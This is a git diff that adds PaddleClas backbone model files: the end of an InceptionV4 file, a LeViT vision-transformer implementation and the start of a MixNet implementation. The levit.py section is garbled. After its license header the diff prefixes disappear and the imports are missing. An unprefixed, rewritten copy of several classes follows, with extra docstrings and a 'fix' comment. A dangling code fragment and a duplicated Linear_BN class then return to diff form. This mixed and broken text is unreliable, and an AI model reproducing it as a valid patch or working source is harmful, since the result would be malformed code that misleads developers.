or `boolean` type." 
+ ) + + +def InceptionV4(pretrained=False, use_ssld=False, **kwargs): + model = InceptionV4DY(**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["InceptionV4"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/levit.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/levit.py new file mode 100644 index 0000000..a797333 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/levit.py @@ -0,0 +1,587 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
MODEL_URLS = {
    "LeViT_128S":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_128S_pretrained.pdparams",
    "LeViT_128":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_128_pretrained.pdparams",
    "LeViT_192":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_192_pretrained.pdparams",
    "LeViT_256":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_256_pretrained.pdparams",
    "LeViT_384":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/LeViT_384_pretrained.pdparams",
}

__all__ = list(MODEL_URLS.keys())


def cal_attention_biases(attention_biases, attention_bias_idxs):
    """Expand the learned relative-position biases.

    attention_biases: [num_heads, num_offsets] parameter table.
    attention_bias_idxs: [N, M] integer index tensor mapping query/key
    position pairs to offsets. Returns a [num_heads, N, M] bias tensor.
    """
    gather_list = []
    attention_bias_t = paddle.transpose(attention_biases, (1, 0))
    nums = attention_bias_idxs.shape[0]
    for idx in range(nums):
        # gather the per-head bias rows for one query position
        gather = paddle.gather(attention_bias_t, attention_bias_idxs[idx])
        gather_list.append(gather)
    shape0, shape1 = attention_bias_idxs.shape
    gather = paddle.concat(gather_list)
    # 0 keeps the leading (num_heads) dimension of the input
    return paddle.transpose(gather, (1, 0)).reshape((0, shape0, shape1))


class Conv2d_BN(nn.Sequential):
    """Bias-free Conv2D followed by BatchNorm2D (fusable at inference)."""

    def __init__(self,
                 a,
                 b,
                 ks=1,
                 stride=1,
                 pad=0,
                 dilation=1,
                 groups=1,
                 bn_weight_init=1,
                 resolution=-10000):
        super().__init__()
        self.add_sublayer(
            'c',
            nn.Conv2D(
                a, b, ks, stride, pad, dilation, groups, bias_attr=False))
        bn = nn.BatchNorm2D(b)
        # fix: honor bn_weight_init as Linear_BN does (the reference LeViT
        # zero-inits the BN scale on residual branches); the argument was
        # previously accepted but ignored. Identical for in-file callers,
        # which all use the default value 1.
        if bn_weight_init == 0:
            zeros_(bn.weight)
        else:
            ones_(bn.weight)
        zeros_(bn.bias)
        self.add_sublayer('bn', bn)


class Linear_BN(nn.Sequential):
    """Bias-free Linear followed by BatchNorm1D over flattened tokens."""

    def __init__(self, a, b, bn_weight_init=1):
        super().__init__()
        self.add_sublayer('c', nn.Linear(a, b, bias_attr=False))
        bn = nn.BatchNorm1D(b)
        if bn_weight_init == 0:
            zeros_(bn.weight)
        else:
            ones_(bn.weight)
        zeros_(bn.bias)
        self.add_sublayer('bn', bn)

    def forward(self, x):
        l, bn = self._sub_layers.values()
        x = l(x)
        # BatchNorm1D needs 2D input: flatten (batch, tokens), then restore
        return paddle.reshape(bn(x.flatten(0, 1)), x.shape)
bias_attr=False))
+        bn = nn.BatchNorm1D(b)
+        if bn_weight_init == 0:
+            zeros_(bn.weight)
+        else:
+            ones_(bn.weight)
+        zeros_(bn.bias)
+        self.add_sublayer('bn', bn)
+
+    def forward(self, x):
+        l, bn = self._sub_layers.values()
+        x = l(x)
+        return paddle.reshape(bn(x.flatten(0, 1)), x.shape)
+
+
+class BN_Linear(nn.Sequential):
+    def __init__(self, a, b, bias=True, std=0.02):
+        super().__init__()
+        self.add_sublayer('bn', nn.BatchNorm1D(a))
+        l = nn.Linear(a, b, bias_attr=bias)
+        trunc_normal_(l.weight)
+        if bias:
+            zeros_(l.bias)
+        self.add_sublayer('l', l)
+
+
+def b16(n, activation, resolution=224):
+    return nn.Sequential(
+        Conv2d_BN(
+            3, n // 8, 3, 2, 1, resolution=resolution),
+        activation(),
+        Conv2d_BN(
+            n // 8, n // 4, 3, 2, 1, resolution=resolution // 2),
+        activation(),
+        Conv2d_BN(
+            n // 4, n // 2, 3, 2, 1, resolution=resolution // 4),
+        activation(),
+        Conv2d_BN(
+            n // 2, n, 3, 2, 1, resolution=resolution // 8))
+
+
+class Residual(nn.Layer):
+    def __init__(self, m, drop):
+        super().__init__()
+        self.m = m
+        self.drop = drop
+
+    def forward(self, x):
+        if self.training and self.drop > 0:
+            y = paddle.rand(
+                shape=[x.shape[0], 1, 1]).__ge__(self.drop).astype("float32")
+            y = y.divide(paddle.full_like(y, 1 - self.drop))
+            return paddle.add(x, self.m(x) * y)  # drop path: x + m(x) * keep-mask/keep-prob
+        else:
+            return paddle.add(x, self.m(x))
+
+
+class Attention(nn.Layer):
+    def __init__(self,
+                 dim,
+                 key_dim,
+                 num_heads=8,
+                 attn_ratio=4,
+                 activation=None,
+                 resolution=14):
+        super().__init__()
+        self.num_heads = num_heads
+        self.scale = key_dim**-0.5
+        self.key_dim = key_dim
+        self.nh_kd = nh_kd = key_dim * num_heads
+        self.d = int(attn_ratio * key_dim)
+        self.dh = int(attn_ratio * key_dim) * num_heads
+        self.attn_ratio = attn_ratio
+        self.h = self.dh + nh_kd * 2
+        self.qkv = Linear_BN(dim, self.h)
+        self.proj = nn.Sequential(
+            activation(), Linear_BN(
+                self.dh, dim, bn_weight_init=0))
+        points = list(itertools.product(range(resolution), range(resolution)))
+        N = len(points)
+        attention_offsets = {}
+ idxs = [] + for p1 in points: + for p2 in points: + offset = (abs(p1[0] - p2[0]), abs(p1[1] - p2[1])) + if offset not in attention_offsets: + attention_offsets[offset] = len(attention_offsets) + idxs.append(attention_offsets[offset]) + self.attention_biases = self.create_parameter( + shape=(num_heads, len(attention_offsets)), + default_initializer=zeros_, + attr=paddle.ParamAttr(regularizer=L2Decay(0.0))) + tensor_idxs = paddle.to_tensor(idxs, dtype='int64') + self.register_buffer('attention_bias_idxs', + paddle.reshape(tensor_idxs, [N, N])) + + @paddle.no_grad() + def train(self, mode=True): + if mode: + super().train() + else: + super().eval() + if mode and hasattr(self, 'ab'): + del self.ab + else: + self.ab = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + + def forward(self, x): + self.training = True + B, N, C = x.shape + qkv = self.qkv(x) + qkv = paddle.reshape(qkv, + [B, N, self.num_heads, self.h // self.num_heads]) + q, k, v = paddle.split( + qkv, [self.key_dim, self.key_dim, self.d], axis=3) + q = paddle.transpose(q, perm=[0, 2, 1, 3]) + k = paddle.transpose(k, perm=[0, 2, 1, 3]) + v = paddle.transpose(v, perm=[0, 2, 1, 3]) + k_transpose = paddle.transpose(k, perm=[0, 1, 3, 2]) + + if self.training: + attention_biases = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + else: + attention_biases = self.ab + attn = (paddle.matmul(q, k_transpose) * self.scale + attention_biases) + attn = F.softmax(attn) + x = paddle.transpose(paddle.matmul(attn, v), perm=[0, 2, 1, 3]) + x = paddle.reshape(x, [B, N, self.dh]) + x = self.proj(x) + return x + + +class Subsample(nn.Layer): + def __init__(self, stride, resolution): + super().__init__() + self.stride = stride + self.resolution = resolution + + def forward(self, x): + B, N, C = x.shape + x = paddle.reshape(x, [B, self.resolution, self.resolution, C]) + end1, end2 = x.shape[1], x.shape[2] + x = x[:, 0:end1:self.stride, 0:end2:self.stride] + x = paddle.reshape(x, [B, 
-1, C]) + return x + + +class AttentionSubsample(nn.Layer): + def __init__(self, + in_dim, + out_dim, + key_dim, + num_heads=8, + attn_ratio=2, + activation=None, + stride=2, + resolution=14, + resolution_=7): + super().__init__() + self.num_heads = num_heads + self.scale = key_dim**-0.5 + self.key_dim = key_dim + self.nh_kd = nh_kd = key_dim * num_heads + self.d = int(attn_ratio * key_dim) + self.dh = int(attn_ratio * key_dim) * self.num_heads + self.attn_ratio = attn_ratio + self.resolution_ = resolution_ + self.resolution_2 = resolution_**2 + self.training = True + h = self.dh + nh_kd + self.kv = Linear_BN(in_dim, h) + + self.q = nn.Sequential( + Subsample(stride, resolution), Linear_BN(in_dim, nh_kd)) + self.proj = nn.Sequential(activation(), Linear_BN(self.dh, out_dim)) + + self.stride = stride + self.resolution = resolution + points = list(itertools.product(range(resolution), range(resolution))) + points_ = list( + itertools.product(range(resolution_), range(resolution_))) + + N = len(points) + N_ = len(points_) + attention_offsets = {} + idxs = [] + i = 0 + j = 0 + for p1 in points_: + i += 1 + for p2 in points: + j += 1 + size = 1 + offset = (abs(p1[0] * stride - p2[0] + (size - 1) / 2), + abs(p1[1] * stride - p2[1] + (size - 1) / 2)) + if offset not in attention_offsets: + attention_offsets[offset] = len(attention_offsets) + idxs.append(attention_offsets[offset]) + self.attention_biases = self.create_parameter( + shape=(num_heads, len(attention_offsets)), + default_initializer=zeros_, + attr=paddle.ParamAttr(regularizer=L2Decay(0.0))) + + tensor_idxs_ = paddle.to_tensor(idxs, dtype='int64') + self.register_buffer('attention_bias_idxs', + paddle.reshape(tensor_idxs_, [N_, N])) + + @paddle.no_grad() + def train(self, mode=True): + if mode: + super().train() + else: + super().eval() + if mode and hasattr(self, 'ab'): + del self.ab + else: + self.ab = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + + def forward(self, x): + 
self.training = True + B, N, C = x.shape + kv = self.kv(x) + kv = paddle.reshape(kv, [B, N, self.num_heads, -1]) + k, v = paddle.split(kv, [self.key_dim, self.d], axis=3) + k = paddle.transpose(k, perm=[0, 2, 1, 3]) # BHNC + v = paddle.transpose(v, perm=[0, 2, 1, 3]) + q = paddle.reshape( + self.q(x), [B, self.resolution_2, self.num_heads, self.key_dim]) + q = paddle.transpose(q, perm=[0, 2, 1, 3]) + + if self.training: + attention_biases = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + else: + attention_biases = self.ab + + attn = (paddle.matmul( + q, paddle.transpose( + k, perm=[0, 1, 3, 2]))) * self.scale + attention_biases + attn = F.softmax(attn) + + x = paddle.reshape( + paddle.transpose( + paddle.matmul(attn, v), perm=[0, 2, 1, 3]), [B, -1, self.dh]) + x = self.proj(x) + return x + + +class LeViT(nn.Layer): + """ Vision Transformer with support for patch or hybrid CNN input stage + """ + + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + class_num=1000, + embed_dim=[192], + key_dim=[64], + depth=[12], + num_heads=[3], + attn_ratio=[2], + mlp_ratio=[2], + hybrid_backbone=None, + down_ops=[], + attention_activation=nn.Hardswish, + mlp_activation=nn.Hardswish, + distillation=True, + drop_path=0): + super().__init__() + + self.class_num = class_num + self.num_features = embed_dim[-1] + self.embed_dim = embed_dim + self.distillation = distillation + + self.patch_embed = hybrid_backbone + + self.blocks = [] + down_ops.append(['']) + resolution = img_size // patch_size + for i, (ed, kd, dpth, nh, ar, mr, do) in enumerate( + zip(embed_dim, key_dim, depth, num_heads, attn_ratio, + mlp_ratio, down_ops)): + for _ in range(dpth): + self.blocks.append( + Residual( + Attention( + ed, + kd, + nh, + attn_ratio=ar, + activation=attention_activation, + resolution=resolution, ), + drop_path)) + if mr > 0: + h = int(ed * mr) + self.blocks.append( + Residual( + nn.Sequential( + Linear_BN(ed, h), + mlp_activation(), + Linear_BN( + h, 
ed, bn_weight_init=0), ), + drop_path)) + if do[0] == 'Subsample': + #('Subsample',key_dim, num_heads, attn_ratio, mlp_ratio, stride) + resolution_ = (resolution - 1) // do[5] + 1 + self.blocks.append( + AttentionSubsample( + *embed_dim[i:i + 2], + key_dim=do[1], + num_heads=do[2], + attn_ratio=do[3], + activation=attention_activation, + stride=do[5], + resolution=resolution, + resolution_=resolution_)) + resolution = resolution_ + if do[4] > 0: # mlp_ratio + h = int(embed_dim[i + 1] * do[4]) + self.blocks.append( + Residual( + nn.Sequential( + Linear_BN(embed_dim[i + 1], h), + mlp_activation(), + Linear_BN( + h, embed_dim[i + 1], bn_weight_init=0), ), + drop_path)) + self.blocks = nn.Sequential(*self.blocks) + + # Classifier head + self.head = BN_Linear(embed_dim[-1], + class_num) if class_num > 0 else Identity() + if distillation: + self.head_dist = BN_Linear( + embed_dim[-1], class_num) if class_num > 0 else Identity() + + def forward(self, x): + x = self.patch_embed(x) + x = x.flatten(2) + x = paddle.transpose(x, perm=[0, 2, 1]) + x = self.blocks(x) + x = x.mean(1) + + x = paddle.reshape(x, [-1, self.embed_dim[-1]]) + if self.distillation: + x = self.head(x), self.head_dist(x) + if not self.training: + x = (x[0] + x[1]) / 2 + else: + x = self.head(x) + return x + + +def model_factory(C, D, X, N, drop_path, class_num, distillation): + embed_dim = [int(x) for x in C.split('_')] + num_heads = [int(x) for x in N.split('_')] + depth = [int(x) for x in X.split('_')] + act = nn.Hardswish + model = LeViT( + patch_size=16, + embed_dim=embed_dim, + num_heads=num_heads, + key_dim=[D] * 3, + depth=depth, + attn_ratio=[2, 2, 2], + mlp_ratio=[2, 2, 2], + down_ops=[ + #('Subsample',key_dim, num_heads, attn_ratio, mlp_ratio, stride) + ['Subsample', D, embed_dim[0] // D, 4, 2, 2], + ['Subsample', D, embed_dim[1] // D, 4, 2, 2], + ], + attention_activation=act, + mlp_activation=act, + hybrid_backbone=b16(embed_dim[0], activation=act), + class_num=class_num, + 
drop_path=drop_path, + distillation=distillation) + + return model + + +specification = { + 'LeViT_128S': { + 'C': '128_256_384', + 'D': 16, + 'N': '4_6_8', + 'X': '2_3_4', + 'drop_path': 0 + }, + 'LeViT_128': { + 'C': '128_256_384', + 'D': 16, + 'N': '4_8_12', + 'X': '4_4_4', + 'drop_path': 0 + }, + 'LeViT_192': { + 'C': '192_288_384', + 'D': 32, + 'N': '3_5_6', + 'X': '4_4_4', + 'drop_path': 0 + }, + 'LeViT_256': { + 'C': '256_384_512', + 'D': 32, + 'N': '4_6_8', + 'X': '4_4_4', + 'drop_path': 0 + }, + 'LeViT_384': { + 'C': '384_512_768', + 'D': 32, + 'N': '6_9_12', + 'X': '4_4_4', + 'drop_path': 0.1 + }, +} + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def LeViT_128S(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_128S'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_128S"], use_ssld=use_ssld) + return model + + +def LeViT_128(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_128'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_128"], use_ssld=use_ssld) + return model + + +def LeViT_192(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_192'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_192"], use_ssld=use_ssld) + return model + + +def LeViT_256(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_256'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_256"], use_ssld=use_ssld) + return model + + +def LeViT_384(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_384'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_384"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mixnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mixnet.py new file mode 100644 index 0000000..c2a1adb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mixnet.py @@ -0,0 +1,815 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. 
+# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +""" + MixNet for ImageNet-1K, implemented in Paddle. + Original paper: 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. +""" + +import os +from inspect import isfunction +from functools import reduce +import paddle +import paddle.nn as nn + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MixNet_S": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MixNet_S_pretrained.pdparams", + "MixNet_M": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MixNet_M_pretrained.pdparams", + "MixNet_L": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MixNet_L_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class Identity(nn.Layer): + """ + Identity block. + """ + + def __init__(self): + super(Identity, self).__init__() + + def forward(self, x): + return x + + +def round_channels(channels, divisor=8): + """ + Round weighted channel number (make divisible operation). + + Parameters: + ---------- + channels : int or float + Original number of channels. + divisor : int, default 8 + Alignment value. + + Returns: + ------- + int + Weighted number of channels. 
+ """ + rounded_channels = max( + int(channels + divisor / 2.0) // divisor * divisor, divisor) + if float(rounded_channels) < 0.9 * channels: + rounded_channels += divisor + return rounded_channels + + +def get_activation_layer(activation): + """ + Create activation layer from string/function. + + Parameters: + ---------- + activation : function, or str, or nn.Module + Activation function or name of activation function. + + Returns: + ------- + nn.Module + Activation layer. + """ + assert activation is not None + if isfunction(activation): + return activation() + elif isinstance(activation, str): + if activation == "relu": + return nn.ReLU() + elif activation == "relu6": + return nn.ReLU6() + elif activation == "swish": + return nn.Swish() + elif activation == "hswish": + return nn.Hardswish() + elif activation == "sigmoid": + return nn.Sigmoid() + elif activation == "hsigmoid": + return nn.Hardsigmoid() + elif activation == "identity": + return Identity() + else: + raise NotImplementedError() + else: + assert isinstance(activation, nn.Layer) + return activation + + +class ConvBlock(nn.Layer): + """ + Standard convolution block with Batch normalization and activation. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_size : int or tuple/list of 2 int + Convolution window size. + stride : int or tuple/list of 2 int + Strides of the convolution. + padding : int, or tuple/list of 2 int, or tuple/list of 4 int + Padding value for convolution layer. + dilation : int or tuple/list of 2 int, default 1 + Dilation value for convolution layer. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + use_bn : bool, default True + Whether to use BatchNorm layer. + bn_eps : float, default 1e-5 + Small float added to variance in Batch norm. 
+ activation : function or str or None, default nn.ReLU() + Activation function or name of activation function. + """ + + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + dilation=1, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU()): + super(ConvBlock, self).__init__() + self.activate = (activation is not None) + self.use_bn = use_bn + self.use_pad = (isinstance(padding, (list, tuple)) and + (len(padding) == 4)) + + if self.use_pad: + self.pad = padding + self.conv = nn.Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + dilation=dilation, + groups=groups, + bias_attr=bias, + weight_attr=None) + if self.use_bn: + self.bn = nn.BatchNorm2D(num_features=out_channels, epsilon=bn_eps) + if self.activate: + self.activ = get_activation_layer(activation) + + def forward(self, x): + x = self.conv(x) + if self.use_bn: + x = self.bn(x) + if self.activate: + x = self.activ(x) + return x + + +class SEBlock(nn.Layer): + def __init__(self, + channels, + reduction=16, + mid_channels=None, + round_mid=False, + use_conv=True, + mid_activation=nn.ReLU(), + out_activation=nn.Sigmoid()): + super(SEBlock, self).__init__() + self.use_conv = use_conv + if mid_channels is None: + mid_channels = channels // reduction if not round_mid else round_channels( + float(channels) / reduction) + + self.pool = nn.AdaptiveAvgPool2D(output_size=1) + if use_conv: + self.conv1 = nn.Conv2D( + in_channels=channels, + out_channels=mid_channels, + kernel_size=1, + stride=1, + groups=1, + bias_attr=True, + weight_attr=None) + + else: + self.fc1 = nn.Linear( + in_features=channels, out_features=mid_channels) + self.activ = get_activation_layer(mid_activation) + if use_conv: + self.conv2 = nn.Conv2D( + in_channels=mid_channels, + out_channels=channels, + kernel_size=1, + stride=1, + groups=1, + bias_attr=True, + weight_attr=None) + else: + self.fc2 = nn.Linear( + 
in_features=mid_channels, out_features=channels) + self.sigmoid = get_activation_layer(out_activation) + + def forward(self, x): + w = self.pool(x) + if not self.use_conv: + w = w.reshape(shape=[w.shape[0], -1]) + w = self.conv1(w) if self.use_conv else self.fc1(w) + w = self.activ(w) + w = self.conv2(w) if self.use_conv else self.fc2(w) + w = self.sigmoid(w) + if not self.use_conv: + w = w.unsqueeze(2).unsqueeze(3) + x = x * w + return x + + +class MixConv(nn.Layer): + """ + Mixed convolution layer from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_size : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Convolution window size. + stride : int or tuple/list of 2 int + Strides of the convolution. + padding : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Padding value for convolution layer. + dilation : int or tuple/list of 2 int, default 1 + Dilation value for convolution layer. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + axis : int, default 1 + The axis on which to concatenate the outputs. 
+    """
+
+    def __init__(self,
+                 in_channels,
+                 out_channels,
+                 kernel_size,
+                 stride,
+                 padding,
+                 dilation=1,
+                 groups=1,
+                 bias=False,
+                 axis=1):
+        super(MixConv, self).__init__()
+        kernel_size = kernel_size if isinstance(kernel_size,
+                                                list) else [kernel_size]
+        padding = padding if isinstance(padding, list) else [padding]
+        kernel_count = len(kernel_size)
+        self.splitted_in_channels = self.split_channels(in_channels,
+                                                        kernel_count)
+        splitted_out_channels = self.split_channels(out_channels, kernel_count)
+        for i, kernel_size_i in enumerate(kernel_size):
+            in_channels_i = self.splitted_in_channels[i]
+            out_channels_i = splitted_out_channels[i]
+            padding_i = padding[i]
+            _ = self.add_sublayer(
+                name=str(i),
+                sublayer=nn.Conv2D(
+                    in_channels=in_channels_i,
+                    out_channels=out_channels_i,
+                    kernel_size=kernel_size_i,
+                    stride=stride,
+                    padding=padding_i,
+                    dilation=dilation,
+                    groups=(out_channels_i
+                            if out_channels == groups else groups),
+                    bias_attr=bias,
+                    weight_attr=None))
+        self.axis = axis
+
+    def forward(self, x):
+        # Split the input once per kernel-size group along the channel axis.
+        xx = paddle.split(x, self.splitted_in_channels, axis=self.axis)
+        out = [
+            conv_i(x_i) for x_i, conv_i in zip(xx, self._sub_layers.values())
+        ]
+        x = paddle.concat(tuple(out), axis=self.axis)
+        return x
+
+    @staticmethod
+    def split_channels(channels, kernel_count):
+        splitted_channels = [channels // kernel_count] * kernel_count
+        splitted_channels[0] += channels - sum(splitted_channels)
+        return splitted_channels
+
+
+class MixConvBlock(nn.Layer):
+    """
+    Mixed convolution block with Batch normalization and activation.
+
+    Parameters:
+    ----------
+    in_channels : int
+        Number of input channels.
+    out_channels : int
+        Number of output channels.
+    kernel_size : int or tuple/list of int, or tuple/list of tuple/list of 2 int
+        Convolution window size.
+    stride : int or tuple/list of 2 int
+        Strides of the convolution.
+ padding : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Padding value for convolution layer. + dilation : int or tuple/list of 2 int, default 1 + Dilation value for convolution layer. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + use_bn : bool, default True + Whether to use BatchNorm layer. + bn_eps : float, default 1e-5 + Small float added to variance in Batch norm. + activation : function or str or None, default nn.ReLU() + Activation function or name of activation function. + activate : bool, default True + Whether activate the convolution block. + """ + + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + dilation=1, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU()): + super(MixConvBlock, self).__init__() + self.activate = (activation is not None) + self.use_bn = use_bn + + self.conv = MixConv( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + dilation=dilation, + groups=groups, + bias=bias) + if self.use_bn: + self.bn = nn.BatchNorm2D(num_features=out_channels, epsilon=bn_eps) + if self.activate: + self.activ = get_activation_layer(activation) + + def forward(self, x): + x = self.conv(x) + if self.use_bn: + x = self.bn(x) + if self.activate: + x = self.activ(x) + return x + + +def mixconv1x1_block(in_channels, + out_channels, + kernel_count, + stride=1, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU()): + """ + 1x1 version of the mixed convolution block. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_count : int + Kernel count. + stride : int or tuple/list of 2 int, default 1 + Strides of the convolution. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. 
+ use_bn : bool, default True + Whether to use BatchNorm layer. + bn_eps : float, default 1e-5 + Small float added to variance in Batch norm. + activation : function or str, or None, default nn.ReLU() + Activation function or name of activation function. + """ + return MixConvBlock( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=([1] * kernel_count), + stride=stride, + padding=([0] * kernel_count), + groups=groups, + bias=bias, + use_bn=use_bn, + bn_eps=bn_eps, + activation=activation) + + +class MixUnit(nn.Layer): + """ + MixNet unit. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. exp_channels : int + Number of middle (expanded) channels. + stride : int or tuple/list of 2 int + Strides of the second convolution layer. + exp_kernel_count : int + Expansion convolution kernel count for each unit. + conv1_kernel_count : int + Conv1 kernel count for each unit. + conv2_kernel_count : int + Conv2 kernel count for each unit. + exp_factor : int + Expansion factor for each unit. + se_factor : int + SE reduction factor for each unit. + activation : str + Activation function or name of activation function. 
+ """ + + def __init__(self, in_channels, out_channels, stride, exp_kernel_count, + conv1_kernel_count, conv2_kernel_count, exp_factor, se_factor, + activation): + super(MixUnit, self).__init__() + assert exp_factor >= 1 + assert se_factor >= 0 + self.residual = (in_channels == out_channels) and (stride == 1) + self.use_se = se_factor > 0 + mid_channels = exp_factor * in_channels + self.use_exp_conv = exp_factor > 1 + + if self.use_exp_conv: + if exp_kernel_count == 1: + self.exp_conv = ConvBlock( + in_channels=in_channels, + out_channels=mid_channels, + kernel_size=1, + stride=1, + padding=0, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=activation) + else: + self.exp_conv = mixconv1x1_block( + in_channels=in_channels, + out_channels=mid_channels, + kernel_count=exp_kernel_count, + activation=activation) + if conv1_kernel_count == 1: + self.conv1 = ConvBlock( + in_channels=mid_channels, + out_channels=mid_channels, + kernel_size=3, + stride=stride, + padding=1, + dilation=1, + groups=mid_channels, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=activation) + else: + self.conv1 = MixConvBlock( + in_channels=mid_channels, + out_channels=mid_channels, + kernel_size=[3 + 2 * i for i in range(conv1_kernel_count)], + stride=stride, + padding=[1 + i for i in range(conv1_kernel_count)], + groups=mid_channels, + activation=activation) + if self.use_se: + self.se = SEBlock( + channels=mid_channels, + reduction=(exp_factor * se_factor), + round_mid=False, + mid_activation=activation) + if conv2_kernel_count == 1: + self.conv2 = ConvBlock( + in_channels=mid_channels, + out_channels=out_channels, + activation=None, + kernel_size=1, + stride=1, + padding=0, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5) + else: + self.conv2 = mixconv1x1_block( + in_channels=mid_channels, + out_channels=out_channels, + kernel_count=conv2_kernel_count, + activation=None) + + def forward(self, x): + if self.residual: + identity = x + if self.use_exp_conv: + 
x = self.exp_conv(x) + x = self.conv1(x) + if self.use_se: + x = self.se(x) + x = self.conv2(x) + if self.residual: + x = x + identity + return x + + +class MixInitBlock(nn.Layer): + """ + MixNet specific initial block. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + """ + + def __init__(self, in_channels, out_channels): + super(MixInitBlock, self).__init__() + self.conv1 = ConvBlock( + in_channels=in_channels, + out_channels=out_channels, + stride=2, + kernel_size=3, + padding=1) + self.conv2 = MixUnit( + in_channels=out_channels, + out_channels=out_channels, + stride=1, + exp_kernel_count=1, + conv1_kernel_count=1, + conv2_kernel_count=1, + exp_factor=1, + se_factor=0, + activation="relu") + + def forward(self, x): + x = self.conv1(x) + x = self.conv2(x) + return x + + +class MixNet(nn.Layer): + """ + MixNet model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + + Parameters: + ---------- + channels : list of list of int + Number of output channels for each unit. + init_block_channels : int + Number of output channels for the initial unit. + final_block_channels : int + Number of output channels for the final block of the feature extractor. + exp_kernel_counts : list of list of int + Expansion convolution kernel count for each unit. + conv1_kernel_counts : list of list of 